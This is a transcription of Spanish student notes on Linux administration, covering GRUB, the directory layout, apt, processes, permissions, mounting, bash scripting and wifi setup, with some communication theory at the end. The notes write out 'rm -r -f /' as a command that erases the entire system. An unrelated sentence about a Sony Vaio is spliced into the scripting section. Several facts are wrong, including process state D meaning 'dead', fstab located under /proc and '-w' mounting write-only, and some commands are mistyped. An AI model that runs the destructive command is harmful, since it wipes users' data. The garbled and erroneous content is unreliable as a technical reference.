Ir a terminal y escribir comando: grep menuentry /boot/grub/grub.cfg cuenta el numero de veces que sale la palabra en el fichero seleccionado.

Save this PDF as:
 WORD  PNG  TXT  JPG

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Ir a terminal y escribir comando: grep menuentry /boot/grub/grub.cfg cuenta el numero de veces que sale la palabra en el fichero seleccionado."

Transcripción

1 LINUX no es un s.o. Es el NÚCLEO. Nomenclatura: a.b.c.-d a : versión b:cuando el numero es par el núcleo es estable. Indica distribución. C: es modificación de la distribución. El s.o es GNU-Linux (gnu is not unix). MODIFICAR SISTEMA DE ARRANQUE. 1- Eleccion de S.O en el arranque. Grub 1.0 (ediciones anteriores de linux de 2009) /boot/grub/menu.lst para editarlo necesitas ser Root.. Grub 2.0 (versiones actuales de linux) /boot/grub/grub.cfg se puede editar a mano pero no conviene. Ir a terminal y escribir comando: grep menuentry /boot/grub/grub.cfg cuenta el numero de veces que sale la palabra en el fichero seleccionado. Archivo : /etc/default/grub Con superusuario abrimos el archivo: sudo gedti /etc/default/grub Cambiar la linea GRUB DEFAULT= x. Esto es para seleccionar el numero de S.O. A la hora de arranque. Si se pone SAVE, carga directamente el anterior s.o que se ejecuto. También se puede poner el nombre de la entrada (menuentry). Ejecutar sudo update-grub, (en suse y mandriva es update-grub2), 2-Consola linux. Cp origen destino copiar mkdir hacer carpeta comando --help ayuda directa de comando man comando ayuda fuerte. Q para salir info comando otro entorno de ayuda. Exit cerrar consola clear limpiar pantalla

2 Estructura de computadora: Este esquema esta optimizado para linux. En win, el núcleo se compone del kernel, la capa de abstracción y el shell. Tipos de enlaces: Links: enlaces llamados lanzadores, que son los accesos directos a las carpetas de windows. Softlinks: son los accesos directos a los programas. Hardlinks: son copias reales del archivo al que enlazan. Comprensión de archivos: Suelen estar comprimidas las cosas. Al descomprimir te lo guarda en /HOME/user_name. Normalmente esta comprimido varias veces con extensiones.tar.gz o.tar.bz. CARPETAS EN CUALQUIER DISTRIBUCIÓN LINUX. /home/user_name : Mis documentos en windows. Dentro de esta carpeta existe una llamada o Escritorio o Desktop. Carpetas de programas: /bin nucleo de ejecutables para todos los usuarios. /usr/bin /usr/local/bin en esta carpeta se guardan los programas de compilación propia. /usr/share Carpeta donde se guardan carpetas para compartir con otros usuarios, tanto a nivel local como en red.

3 Carpeta donde los sistemas linux montan los dispositivos: /mnt : antiguamente, pero se guarda por compatibilidad. /media : actualmente se montan en esta carpeta /cdrom : monta el CD-ROM /dvd : monta el DVD. /dev se guardan los dispositivos del hardware, se guardan las configuraciones de los dispositivos. / Llamada raíz. Cualquier ruta siempre empieza con el símbolo de raíz. Es donde empieza todo. /root es la cuenta de superusuario. /proc información guardada para poder visualizar le sistema de archivos, del montaje y desmontaje del sistema de fichero. /proc/fstab tabla del sistema de archivos que carga cuando el sistema arranca. /sbin se creo para distinguir los ejecutables del sistema y de programas. Actualmente en /sbin guarda los ejecutables del sistema. /srv guarda información sobre servicios que instale el usuario, no los del sistema. /sys información encriptada, y es la imagen que tiene el Kernel de los dispositivos. /tmp guarda los archivos temporales que se utilizan mientras funciona un programa, un ejecutable, un archivo, y al apagar el sistema se vacía. /var se guardan los sistemas de intercambio, los bufferes de memoria. Pero existen subcarpetas con configuración de servicios del sistema, así como controladores de servidores web. /boot imágenes de arranque y las invocaciones de INIT. /boot/grub gestor de arranque con Grub. Se puede modificar, leyendo la documentación se modifica fácilmente. /boot/lilo gestor de arranque con Lilo /etc están,generalmente, las configuraciones de los programas y de los servicios. /lib se guardan las librerías compartidas /lost+found cuando al guardar algo se guarda mal, se puede encontrar aquí el documento con información. /opt se guardan paquetes de programas que guardan opciones modificadas de programas. REPOSITORIOS: Main donde están todos los paquetes soportados y comprobados por la distribución. Restricted programas comprobados por la distribución pero que no son de licencia pública. Ejem. Controlador de la tarjeta gráfica. Universe gratuitos, de la comunidad, pero que no estan soportados ni comprobados por la distribución. Multiverse son los no soportados por la distribución y que no son de licencia pública. Ejem. Los codecs de audio. SYNAPTIC : es un entorno gráfico (GUI) para un programa llamado APT. APT : /etc/apt/sources.list se puede modificar con superusuario, y es una lista de fuentes para descarga de programas. Los nombres de los archivos para descargar suelen ser DEB.XXXXX o RPM.XXXXX. Además, podemos descargar el codigo fuente, que se llama DES-SRC.XXXXX. Con apt-get se invoca desde la consola al APT. Para instalar : apt-get install nombre_del_paquete Para forzar instalar las dependencias del programa: apt-get install -f nombre_del_paquete Para desinstalar : apt-get remove nombre_del_paquete. NO borra el paquete del equipo, lo deja

4 en el equipo. Para borrar del todo: apt-get purge nombre_del_paquete. Apt-get update actualiza la lista de los componentes que tienes en el equipo. Es conveniente, después de un purge, por si acaso. Apt-get upgrade instala las actualizaciones. Es como usar el gestor de actualizaciones. Apt-get autoremove apt-cache invoca a la base de datos de APT. Apt-cache search expresion busca esa expresion en la bb.dd. Shotdown -h now apaga el sistema, detiene todos los servicios.. Less paginador por defecto. Que se encarga de paginar la salida de la consola. Para usarlo se pone comando less aptitude tiene menos funciones que apt, pero tiene la ventaja que se permite ejecutar desde una consola remota. Sirve para instalar programas. Con la opción -g, si el programa no esta instalado, lo instala. Opcion -q opcion / opcion n INSTALAR TIPOLOGIAS DE LETRAS. APT-GET INSTALL MSTTCOREFONTS FC-CACHE -FV RECARGA LA BASE DE DATOS DE FUENTES SIN NECESIDAD DE REINICIAR. Las fuentes quedan en /usr/share/fonts COMANDOS PS muestra los procesos del sistema. En linux no se denominan procesos, sino demonios (demon) Ps ax A muestra los procesos de todos los usuarios. X muestra los procesos que no estén vinculados a ninguna terminal. Ps -f muestra las dependencias padre-hijo. Ps -u nombre_user muestra los procesos de ese usuario. Ps -A muestra todos los procesos que tenga el sistema noticia de ellos. Ps -forest hace como pstree. Si a ps +modificador le añades -ef saca mas información. PID Identificador del proceso TTY Terminal que esta ejecutando el proceso. STAT Estado del proceso. Si ha estado o no en marcha. La letras nos dan una pista sobre le proceso. : S : sleep R : ejecución.(run) D : acabado (death) y no puede ser rearrancado. O que hizo su cometido y acabo. Z : Zombie. Se ejecuto, algo salio mal y no se pudo descargar de la memoria. T : detenido pero se puede arrancar. X (version de z): acabo el proceso pero por mal funcionamiento no se darcargo de la ram. I : dormido como s (menos de 20 seg) ojo según distro puede ser al reves. P : esperando para swap <> prioridad mayor o menor.

5 Swap nucleo w n TIME Tiempo en el que se ejecuto desde el inicio del equipo. COMAND Desde donde se ejecuta. El demonio init, es el principal y mas importante. Es lo primero que se lanza al cargar el S.O y es el que llama a los demás procesos. El ejecutable de este proceso esta grabado en /sbin/init, y tiene los parámetros de iniciación guardados en una tabla que se encuentra en /etc/inittab. Los niveles de ejecución (runlevels), del 0 al 6, en casi todas las distribuciones los niveles del 2 al 5 son iguales. Ubuntu usa como standar el nivel 2, mandriva nokis y alguna otra utilizan el nivel 5. Estan escritos en unos archivos en {rc0.d, rc1,d, rc2.d, rc3.d, rc4.d, rc5.d, rc6.d} en estas carpetas lo que hay son enlaces simbolicos.la estructura de estos enlaces es S<numero>nombre_servicio. S28Network_mon : se ejecuta en el nivel 2, es el demonio que monitoriza el entorno de red. Comando de consola: init numero_runlevel cambia de nivel de ejecución. Init 6 reinicia el equipo. Init 0 apaga el equipo. Init 1 modo de recuperación del sistema. Carpeta llamada /etc/init,d, donde estan todos los scripts de iniciacion y detencción para todos los servicios del sistema. Lo que tiene dentro es archivos con el nombre del servicio, y lo que se puede hacer es arrancarlos, pararlos, reiniciarlos. En la consola se puede poner /etc/init.d nombre_servicio {start, stop, rstart, reload,status}. Los comand cuyo nombre aparece entre corchetes son del sistema. Luego estan los procesos GETTY. Son los que estan asociados a las terminales. Syslogd : este demonio es el que registra los eventos del sistema. Klogd : este demonio es el que registra los eventos del kernel. Los log se guardan en la carpeta: /var/log. El log del nucle es el kern.log y el otro sys.log o messages. Avahi tiene dos procesos, uno del núcleo y otro del sistema, que se encargan de controlar las comunicaciones. D-bus demonio que establece un canal de comunicación interno, por el que se comunican los programas entre ellos. Esta asociado a HAL( Hardware abtraction layer), que es una capa que permite entender por parte del software el hardware. Cups Common Unix Printer System. Es el demonio preparado para imprimir. Comunicaciones inalámbricas: bluetoothd controla los dispositivos bluetooth. wpa-supplicant controla la comunicación wpa. Nm-system-settings controla el gestor de redes inhalambricas. ALSA Advanced Linux Sound Architecture. El programa que maneja este controlador se llama pulseaudio. GFVS demonio muy importante en todos los linux sobre los del escritorio Gnome. Gnome File Virtual System. Es el controlador de los sistemas de ficheros virtuales. Carpeta llamada /etc/init,d, donde estan todos los scripts de iniciacion para todos los servicios del sistema.

6 dmesg informa de las cosas que han ocurrido en un dispositivo desde que se inicio la sesión. Como hay muchos, ponemos filtro: dmesg grep etch0. Con el modificador -i muestra todos los mensajes seleccionados sin contar que este escrito en mayúsculas o minúsculas. Pstree muestra los procesos en forma de árbol. Sirve para saber que si paras un proceso, sabes que procesos cuelgan de el. Con -p muestra los identificadores de los procesos. Kill sirve para cargarse un proceso. Se utiliza como: kill -nº PID el -nº es un numero del 0 al 15. El -15 es como no poner nada, preguntando. El -9 apaga directamente el proceso eliminándolo de la RAM. Grep es un comando que se utiliza con otros comandos para que filtre la información. Ejem. Ps ax grep -i synaptic : la salida del ps donde el nombre del proceso contenga synaptic. TOP es igual que PS pero a tiempo real. TERMINAL: Para abrir una termnal CNTRL + ALT + F2. Para cada terminal un Fx distinto desde F1 hasta F6. Para cerrar una sesión de terminal CNTRL + D Para cerrar el terminal CNTRL + ALT + F7 Programas GSTREAM(ER) Paquete de codecs. D4X gestor de descargas pero de código libre, como JDownload. Amarok reproductor de audio. VLC mejor reproductor de audio. InDesign programa de maquetación. Dia programa para hacer diagramas. Amsn : messenger. Inkscape : programa de dibujo vectorial profesional. Bluefish : editor de paginas web como Dreamweaver. Audacity : editor musical. WINE : Permite ejecutar ejecutables de win sobre linux. Pingus: juego como Lemmings. Supertuxkart: juego como mariokarts. Intalar paquetes en debian (DEVejecutables) apt -get install no download nombrepaq.deb XXXXXXX.TAR.GZ DERECHOS DE ESCRITURA TAR -ZXV :NOMBRE PAG.TAR.GZ DESCOMPRIME EL PAQUETE.tar.bz2(nombre archivo) tar -jxvf CD NOMBRE PAQUETE -BUSCAR PAQUETE NANO README LEER,/CONFIGURE MAKE establece la configuraciones make install

7 dpkg install paquete.deb unpack desempaquetar configure info - informacion de paquete status - mas informacion avisa si esta instalado remove - borra la instalación del programa pero no la configuracion purge - borra todo hostname whoami id ufd identificador de usuario gid identificador de gname date (fecha) man date(todo) time is who usuario del equipo rwho -a todos los usuarios que se han conectado al servidor. Finger (nombre_usu) información sobre el usuario que eres last: muestra el historial de las últimos usuarios del sistema history more lista de comando que has utilizado killall nombre de programa uname -a : muestra información general del sistema. Free : memoria libre y consumida. Estado de la memoria. Parámetros {-m, -g, -b,- k) para que me de la información en la unidad de medidas que queremos. -T nos da los números totales. Df : espacio libre en discos duros. df -h :nos muestra la información legible para los humanos. df -h /dev/sda : particiones. Du -h nom_archi: nos muestra la información de un archivo. Swapon -s : muestra información de la paginación swap. Fdisk : programa que sirve para hacer particiones. Fdisk -l : lista la tabla de particiones. Lsmod : lista los módulos del kernel, lo que serian los controladores del mundo windows. Lspci : información sobre el hardware. -v : muestra mas información -vv : mas información -nn : nos da los números y los nombres de los dispositivos de hardware. -k : nos da los módulos asociados del núcleo. La información sobre todo esto se encuentra en /proc, es donde se monta el sistema de ficheros virtual del kernel. Existe un montón de ficheros de texto, que si se modifican puede suponer un problema. cat ruta_archivo : nos muestra el contenido de un archivo. Cat /proc/.cpuinfo : información sobre el chipset de la placa base. Cat /proc/.versión : versión del kernel de linux cat /proc/interrupts: muestra las interrupciones. Cat /proc/filesystems : información sobre los distintos sistemas de ficheros soportados por en núcleo. Cat /proc/printcap : configuración del sistema de impresión.

8 Ls : listar el contenido de el directorio seleccionado. -aux : conbinaccion de varias. Muestra los archivos de todos los usuarios. -a : muestra los archivos ocultos -la : muestra los permisos y propietarios incluso de los archivos ocultos. -f : muestra el contenido de los directorios. -i : muestra los i-nodos (especie de direcciones donde apuntan los dispositivos o donde apuntan los archivos al kernel) -m :muestra los directorios separados por coma. -r : muestra las cosas del revés. -s : muestra el tamaño de los objetos -t : los ordena por fechas, generalmente la de creación. -R : hace un listado recursivo, mostrando los subdirectorios. -l : muestra los permisos y propietario. Mkdir : crea un directorio. -p : con esta opción podemos crear arboles enteros. Es decir no tenemos que ir creando carpeta a carpeta, sino poner la ruta directamente y crea todas las carpetas. -m xxx: asigna permisos al directorio creado. Donde x es el tipo de permiso. Rmdir : borra directorios, siempre y cuando el directorio esta vacío -p : borra el árbol entero. Touch XXXX: crea un archivo vacío con el nombre dado. Cp origen destino: copia un archivo en otro. -p : copia el archivo tal cual, con permisos y su sistema de fechas. -r : copia los subdirectorios. -i : pregunta si quieres sobreescribir o copiar. Mv origen destino: mover archivos. -i : pregunta si quieres sobreescribir o copiar. Rm : borra archivos y directorios, sin preguntar salvo que sean archivos del sistema -i: pregunta si quieres realmente borrar. -f : fuerza el borrado aunque sean archivos del sistema. -r: se carga los directorios existentes -v : informa de lo que va haciendo. Rm -r -f / borras el sistema completo de archivos. La has jodido. Permisos: Ugo User Group Other. Es el sistema de permisos. Chmod : es el que permite cambiar permisos a archivos. g+rw : añade algrupo lectura y escritura g-rw : qita al grupo lectura y escritura. Chmod u{+-}rwx, g{+-}rwx, o{+-}rwx archivo generalmente se escribe así. Chmod ugo +--w ---x +---x archivo seria otra manera de ejecutar este comando. Chmod ugo=rwx archivo otorga permisos de todo a todos. En sistema octal tambien se puede ejecutar chmod: x -w- -wx r-- R-x rw- rwx chmod num_user num_gruop num_other archivo chmod 777 archivo Una utilización normal es con 755, es que tu puedes hacer lo que quieras y los demás leerlo y ejecutarlo.

9 Se suele utilizar un numero delante de los permisos. Ejem: Esto lo que hace es pemitir ejecutar un archivo como si fueses otro usuario. Es un bit llamado S, y permitiria, dependiendo del valor: 4 todo el mundo puedo ejecutarlo con los permisos del creador. (U) 2 puede ejecutarlo con los permisos del grupo del creador (G) 1 se usa en los directorios para 'distinguir' usuarios. Chgrp nom_grupo archivo : sirve para cambiar el grupo. Groups me da un listado con los grupos del sistema. archivo dice a que grupos pertenece ese archivo. Chown : permite cambiar de dueño el archivo. Chown -R pepito /home/pepito le asignas carpeta personal al usuario. Mount -o loop nom_img_disk /ruta/directorio/ Comando para montar una imagen de un disco para poder andar por dentro de los archivos de esa imagen. Importante barra de final de ruta. Mount /media/cdrom monta el cd-rom mount /media/dvd monta el dvd mount /media/usb monta el usb umount + ruta desmonta lo que tengas montado en la ruta especificada. Netstat -putan greep nom_prog : nos muestra el estado de unprograma que esta arrrancado desde la tarjeta de red. -w : muestra quien y que esta haciendo. Comando > archivo : carga el resultado del comando en el fichero. Comando > archivo.txt : carga el resultado del comando en el fichero en windows. Comando >> archivo : si existe el fichero, lo conserva y añade el resultado al final. Sync : sincroniza passwd usuario: cambiar la contraseña a un usuario. Gpasswd -M usuario grupo : añadir un usuario a un grupo. -A usuario grupo: es el administrador del grupo. Lsof :saber las cosas que hay en ejecución y lo que esta pillado. Lsof greep /dev/{hda1, cdrom, dvd } : sabe que proceso ha dejado pillado el disco duro, el cdrom o el dvd. Sata sda scsi sdb usb sdc cat : empalmar archivos y leer, es como el edit de windows. Cat arch.txt arch2.txt Head -3 archivo : muestra las 3 primeras lineas del archivo. Tail -5 archivo: muestra las 5 ultimas lineas del archivo. Mount -t sis_de_fichero {NTFS, VFAT, EXT3, RAISER...} dispositivo[/desv/algo] pto_montaje[/mnt/algo, /media/algo...] -V : versión de mount -h : ayuda

10 -v :informa de todo lo que va haciendo -a :monta todo lo que hay en fstab(tabla de sistemas de archivos). -f : no hace nada. -n :montaje temporal que no escribe nada en la tabla fstab -s : permite algunos errores en el montaje -r: -o ro: monta el sisema de ficheros solo lectura -w: -o rw: monta el sistema de ficheros en solo escritra. -t : tipo de sistema de fichero. Hay que decirselo para que no lo monte en CD. MOUNT -T AUTO. -A -T NOMSOLO,EXT : monta todo lo de fstab menos los que sean nomsolo y ext. Fstab : /etc/fstab : se puede leer con cualquier editor de texto, no se puede modificar si no eres root. <file system> <mount point> <type> <options> <dum> <pass> /dev/sda1 /windows ntfs 0 0 /dev/sda5 / ext4 relatime, errors = remount-rce 0 0 /dev/sda6 none swap sw 0 0 /dev/scd /media/cdrom udf iso9660 user, noauto,exec,utf8 0 0 /dev/fd0 /media/floppy0 auto rw, user, noauto, exec, utf auto : particion se monta al iniciar el sistema. -noauto: particion no se monta al iniciar el sistema. -user : permita a los usuarios montar la particion. -nouser: solo root puede montar la particion. -ro : solo lectura -rw : lectura y escritura -exec:se permite ejecutar programas -async : el sistema sigue trabajando tras una petición de escritura. -Default: equivale a poner rw, exec, auto, nouser, async. Grabar cd: -whereis cdrecord : instrucción para saber si tenemos este programa para grabar cd. 1- comprobar si hay grabadora: whodim scanbus POR SI NO VA. Wodim - -devices -scanbus 2- Crear la imagen ISO MKISOFS -R -V -J- O /TMP/IMAGEN.ISO /DIRECTORIO_ORIGEN -r: todos los permisos de lectura y ejecución uid guid toda a 0 -v:verbase, te da información de todo lo que hace cuando se ejecuta. -J:extensión que permite nombre de mas de 8 letras -o: selecciona el directorio de salida. 3- Grabar cdrecord -eject -v dev=0,0,0 /temp/imagen.iso

11 GRABAR IMAGEN ISO. Crear una imagen ISO Para crear una imagen de los datos que queremos grabar, utilizamos mkisofs: mkisofs -r -o imagen.iso directorio Con la opción -r generaremos un sistema de archivos con extensión Rock Ridge. Quemar la imagen ISO Para quemar el CD/DVD usamos wodim, primero detectamos la grabadora: $ wodim --devices wodim: Overview of accessible drives (1 found) : dev='/dev/scd0' rwrw-- : 'TSSTcorp' 'DVD+-RW TS-L632D' Ya podemos empezar a grabar: wodim -v -eject dev=/dev/scd0 imagen.iso En mi caso la grabadora es /dev/scd0 shell script: Existen varios tipos de consolas en Linux. La mas recomendada es BASH, y es de software totalmente libre. La extension mas utilizada para los script en Linux son.sh, aunque no es necesario la extensión, se ejecutan igual tengan o no tenyo uso una computadora portátil Sony Vaio VGN-FE890 ejecuta kernel de Linux gan extensión. Todos los script del sistema acaban en.sh. La primera es la unica linea obligatoria en todos los script: #!/bin/bash hace la llamada a la consola, y tiene que empezar asi todos los script. Cualquier linea que empiece por # es un comentario. Ejem: #!/bin/bash #hola ls #adios Los script se pueden guardar en cualquier carpeta, pero con permisos de escritura. Hay que dar permisos al fichero, para ello usamos el comando CHMOD (véase mas arriba). Si se guardan en una carpeta que el sistema reconozca como carpeta para ejecutables, desde la consola se pueden invocar directamente. Para saber las carpetas para ejecutables se usa el comando echo $PATH. Echo: muestra en pantalla un texto seleccionado. Ejem: echo hola, muestra hola. Si lo pones entre comillas lo pone como texto, sino lo intenta ejecutar. -e texto: permite usar el carácter de escape (\) que hace que lo que vaya detras sea una ejecución especial. Ejem: /a : sonido

12 /b : retrocede un carácter /n : salto de linea /t : tabulación horizontal /v : tabulación vertical \ : escribe comillas. Si se pone con un símbolo, se escribe el símbolo que vaya detrás. Read: lee lo que nosotros introducimos. -p : fuerzas la espera del parametro. -p texto: te escribe el texto seleccionado y espera que metas un valor. Variable = lo que sea : se le asigna a esa variable el valor que le pasemos. Para mover de variable a variable se tiene que poner variable1 = $variable2. Echo, read, $+num, no se puede utilizar como variable. Algunas variables establecidas internamente por el shell y que están disponibles para el usuario: $1 - $9 parámetros posicionales $0 nombre del comando actual $# número de parámetros posicionales $? exit status del último comando ejecutado dado como un string decimal. Si todo ha ido bien se retorna cero. $$ el numero de proceso de este shell, útil para incluirlo en nombres de ficheros para hacerlos únicos. $! la pid del último comando ejecutado en background. $- las opciones actuales suministradas para esta invocación del shell. $* un string que contiene todos los argumentos del shell comenzando por el $1. igual que el anterior, excepto cuando va entrecomillado. Matrices (arrays). Puede almacenar numero texto o incluso otras matrices. nom_matriz[nº] = valor El primer valor de una matriz es el 0. Las arrays de los script funcionan de la misma forma que los arrays de cualquier lenguaje de programación. Una array es un conjunto o agrupación de valores cuyo acceso se realiza por índices, en un script se puede almacenar en un mismo array todo tipo de cosas, números, cadenas, caracteres, etc. En las arrays el primer elemento que se almacena lo hace en la posición 0 ( en el ejemplo seria Paco ). En los script no hace falta declarar el tamaño de la array, puedes insertar tantos valores como desees. Para declarar una array es: declare -a nombre_array declare -a nombres La opción -a sirve para decir que lo que vas a declarar es una array. Para darle valores se puede hacer de dos formas: 1. Darle valores posición por posición. nombre_array[posicion]=valor nombres[3]=manolo

13 2.Darle todos los valores de golpe ( aunque también se puede decir la posición deseada en la que quieres guardar uno de los valores ). nombre_array=( valor1 valor2 valor3 [posicion]=valor4... valorn ) nombres=( Maria Alberto Rodrigo [7]=Paco ) Para ver el contenido de la array en una posición: ${nombre_array[posicion]} ${nombres[0]} Para saber cuantos elementos contiene la array: ${#nombre_array[*]} ${#nombres[*]} Bucle: #!/bin/bash #bucle chachi r=0 for i in $(ls /home) do usuarios[$r] = $i r = $r +1 done echo ${usuarios[1]} Metacarácteres: *? [] ho[lj]a (hola) \ escribir ciertos caracteres. Echo \* $ se usa para poner delante del nombre de una variable para hacer invocación a los comandos de la consola. para cadenas de texto echo \ para escribir comillas ~ hace referencia a /home/user, carpeta raíz del usuario. Operaciones: + suma - resta * multiplicación / división % módulo. Nos da el resto de la operación. Los símbolos * / % tienen preferencia sobre el símbolo + -, salvo que existan paréntesis. Estructuras lógicas: if else si sino if [condición] then instrucciones que se ejecutan si la condición es cierta elif[condición] instrucciones que se ejecutan si la condición del primer if es falsa y la de el elif es cierta else instrucción que se ejecuta si las condiciones anteriores son falsas.

14 Fi Estructura CASE: CASE valor IN patron ) instrucciones ;; patrón 2) instrucciones ;; *) instrucciones ;; esac. Condiciones lógicas:!expresion? estoy preguntando si es cierta la expresión. Responde TRUE o FALSE. Expr1 -a exp2? es el and o Y lógica. Para que sea cierto tienen que ser iguales. Expr1 -o exp2? es el or o O lógico. Numeros: Int1 -eq int2? esto se cumple si son iguales. Int1 -gt int? mayor que int1 -lt int? menor que int1 -ge int? mayor o igual int1 -le int? menor o igual STRINGS: -z cadena? cierto si la cadena esta vacía cad1 = cad2 esta preguntando si las cadenas son iguales cad1!= cad2 esta preguntando si las cadenas son distintas. cadena? cierto si la cadena no es nula. Archivos: -d archivo? existe y es directorio. -e archivo? tiene que existir. -r archivo? tiene que existir y tener permisos lectura. -w archivo? tiene que existir y tener permisos de escritura. -x archivo? tiene que existir y tener permisos de ejecución break interrumpe la ejecución de las sentencias condicionales. Funciones: function nom_funcion(par1 par2.) { comandos } Invocar funciones nom_función(par1 par2...) realiza la llamada. Var = nom_función si da un resultado, se le asigna una variable. La función tiene que

15 tener un return nom_resultado. Paquetes para visualizar cosas en shell script: GNOME ZENITY saca ventanas para seleccionar cosas. KDE KDIALOG saca ventanas para seleccionar cosas. Comandos: var = zenity/kdialog opcion[par] --calendar muestra un calendario para seleccionar fecha --file-selection para seleccionar archivos en modo gráfico. --notification ventana para enviar mensaje --list muestra una lista para elegir algún elemento de la lista --progress muestra una barra de proceso. --entry muestra un campo de texto para introducir valores. --text-info similar a notification, solo que aquí sale unicamente un texto --warning muestra advertencias --error muestra mensajes de error --info mensajes informativos --question muestra una pregunta. Exite el campo TITLE: VAR = zenity - -entry title='xxxxx' Es el titulo que le quieres dar a la ventana que aparecera > Comando para configurar la tarjeta de red: ifconfig iwconfig permite configurar tarjetas de red inalámbricas. Como poner a funcionar una tarjeta de red inalámbrica mediante controladores de windows. Ndiswrapper es conveniente tener instaladas las wireless-tools. Instalar en ordenador. ejecutar: ndiswrapper -i ruta (la ruta es donde se encuentran los controladores de la tarjeta ndiswrapper : una vez acabado el anterior, ejecutamos esto. Y contestara: net. present. modprobe ndiswrapper: fuerza a que le nucleo de linux use esa tarjeta. Esto no es permamenente, cuando se reinicie el equipo, se tiene que ejecutar este comando. Dmesq grep wlan : comprobamos que realmente esta usando la tarjeta de red que instalamos. La respueste debe de ser WLAN0:ndiswrapper > Cuando se configura una red puede convenir añadir los DNS. Desde la consola los comandos no añaden los DNS. Los archivos están en /etc/resolv.conf, se puede escribir a pelo las ip de la DNS al final. O escribir desde la consola: echo IP..ip >> /etc/resolv.conf IFCONFIG Comando de configuración de red de linux. Es similar a ipconfig, salvo que este no solo muestra información, tambien puedes hacer cosas. -a : muestra información de los dispositivos de red. Las tarjetas de red cableadas normalmente eth0, y las inalámbricas wlan0, aunque tambien se puede encontrar wifi0. ifconfig nom_interfaz [direccion [parametros]] estructura del comando IFCONFIG. La dirección suele ser una ip directa.

16 Encapsulamiento (link encap), MAC(dirección), direc ip (direc. Inet), difus (broadcast) masc (mascara de red) mtu (unidad máxima de transferencia) Métrica(nº de saltos para llegar a otro nodo) -up : pone a funcionar el dispositivo de red. -down : apaga el dispositivo de red. -netmask mascara : poner la mascara de red a tu tarjeta de red. -broadcast : muetra la dirección de difusión de nuestra red. -pointopoint : se utiliza para conectar un ordenador a otro. Es una red AD HOC (se comunican equpos entre ellos). -irq : establece lineas irq (antiguo canal del chat). -metric : los saltos para llegar a otro modo, suele estar en auto. El demonio RIP, es el encargado de leer la metrica para mandar los paquetes. -mtu : modificar la tasa máxima de transferencia. -arp : es el protocolo de resolución de direcciones (Address Resolution Protocol). Sirve para detectar las MAC de las demás tarjetas. Si esta desactivado en el ifconfig pone noarp. Con arp lo activas con -arp lo desactivas. promisc : algunas veces monitor: es poner la tarjeta de red en modo promiscuo, es decir, que permanece a la escucha. Permite leer todo lo que haya en la red, los paquetes que que van para el y los que no. No todas las tarjetas pueden entrar en modo promiscuo. Para activar el modo promiscuo promisc para desactivarlo -promisc. allmulti : habilita la multidifusión, el multicast de paquetes. Para apagarlo -allmulti IWCONFIG Comando de configuración de red wifi de linux. Multiples opciones. iwconfig[interface [cosas]] : estructura. essid nombre_red : nombre de la red inhalambrica a la que queremos conectacnos. Freq : channel num_canal : en España permitidos del 0-13, aunque existe el 14. mode : impone el modo en el que opera el dispositivo. Los modos son : ad-hoc: modo punto a punto managed : es el modo infraestructura, las redes normales. Modo standar. Master : tu tarjeta es la encargada de dirigir el trafico. Repeater : tu tarjeta actuaria como repetidor de la señal. Monitor : modo promiscuo de la tarjeta de red inalámbricas. auto : lo normar es que se ponga en managed. ap dirmacdelap : nos fuerza a asociarnos con el punto de acceso seleccionado. Key clave: establecer la clave para la red > SCRIPT PARA CONFIGURAR UNA IP FIJA: #!/bin/bash #Para ip fija del ordenador. #modprobe ndiswrapper iwconfig wlan0 mode managed #iwconfig wlan0 key restricted contraseña iwconfig wlan0 essid nom_ap ipconfig wlan0 up IP route add default gu ip-router #contraseña : se pone la de la conexión #nom_ap : punto de acceso

17 #ip : ip que queremos ser #default : nombre del router #ip-router : ip del router > SCRIPT PARA ACTIVAR O DESACTIVAR UNA IP FIJA #!/bin/bash #para activar/desactivar #para ejecutarlo activar_desactivar {anda para } clear case $1? in 'anda') # modprobe ndiswrapper pwconfig wlan0 mode managed # iwconfig wlan0 key contraseña iwconfig wlan0 essid nom_ap ifconfig wlan0 up ip router add default gu ip_router ;; 'para') ifconfig wlan0 down ;; *) echo "Modo de uso: activar_desactivar {anda para}" ;; esac exit Restituir arranque de Linux. Si formateamos la particion de windows, desaparece la opción de arranque de linux, es decir, se borra el grub, al modificar el MBR. Los pasos son los siguientes: arrancar con un LiveCD sudo mkdir /media/ubuntu sudo mount /dev/sd6 /media/ubuntu /dev/sd6 es la particion donde esta instalado el S.O conexión directa entre disco fisico y el sistema de ficheros anterior: sudo mount - -bind /dev /media/ubuntu cambiar el root al nuevo: sudo chroot /media/ubuntu/ Instalar grub: grub -install /dev/sda : /dev/sda tiene que ser el sector de arranque del disco. reiniciar > Teoria de la comunicación. Analogico : Es el sistema que puede tener todos los valores. Digital: es el sistema que solo tiene los extremos. Sistemas de transmisión de datos Serie: tenemos transmision de grupos de bits por el mismo cable. Paraleleo: cada bits se transmite por un cable diferente. (Dibujos en cuaderno)

18 EMISOR > CANAL/MEDIO > RECEPTOR MENSAJE MENSAJE Nombre de las comunicaciones: Simplex :existe un emisor, una linea y un receptor. Semiduplex(Halfduplex): existe un emisor, un receptor y dos lineas no simultaneas. Duplex (fullduplex): existe un emisor, un receptor y una linea bidireccional y simultanea. Ondas: dibujo en cuaderno. Onda electromagnética: es una perturbación del campo electromagnético. Son luz. La velocidad de propagación es una constante, C = 3*10 8 M/s = km/s, y lo que tiene es diferente longitud de onda. Λ = C C = Λf T Ejemplo: Una onda de 100MHz, calcular su frecuencia (cuaderno) El estándar wifi se define para trabajar con ondas cuyas frecuencias están alrededor de 2,4GHz. Longitud de onda 0,125m. La linea de giro de la onda se llama polarización. Ley de Ohm. V=R*I V: Potencial (Voltios) R:Resistencia(Ohmios) I: Intensidad (Amperios) Espectro electromagnético: Es la realción entre amplitud y frecuencia. Decibelio (db) Esquema de transmision. Codificación de caracteres para transmision de datos. ASCII : American Standar Code for Information Interchange (1963). Es un tipo de código de codificación. (CCITT nº 5, son tablas internacionales de comunicaciones). Utilizaba inicialmente 7 bits, actualmente son 8bits. EBCDIC : Extended Binary Code Decimal Interchange Code. Usado por IBM, parecido al ASCII, y con el tiempo ASCII lo absorvio. BAUDOT : CCITT nº2. Red telegráfica conmutada

